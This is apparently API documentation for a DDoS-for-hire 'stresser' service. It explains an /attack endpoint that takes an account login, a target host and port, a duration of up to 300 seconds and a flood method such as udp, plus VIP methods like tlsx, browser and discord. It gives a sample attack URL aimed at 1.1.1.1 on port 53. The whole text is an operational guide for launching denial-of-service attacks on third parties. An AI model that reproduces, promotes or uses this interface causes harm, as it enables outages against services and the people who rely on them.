API Usage
Launch attacks instantly using our simple API endpoint.
Endpoint
/attack?username=&password=&host=&port=&time=&method=
Example Attack
/attack?username=example&password=exampleacc&host=1.1.1.1&port=53&time=15&method=udp
Parameters
| Parameter | Description |
|---|---|
| username | Your account username |
| password | Your account password |
| host | Target IP or domain (e.g. 1.1.1.1 or google.com) |
| port | Target port (e.g. 80, 443, 25565) |
| time | Attack duration in seconds (max 300s) |
| method | Attack method (see below) |
Available Methods
For a full list of attack methods, including VIP-only ones like tlsx, browser, and discord, visit:
View All Methods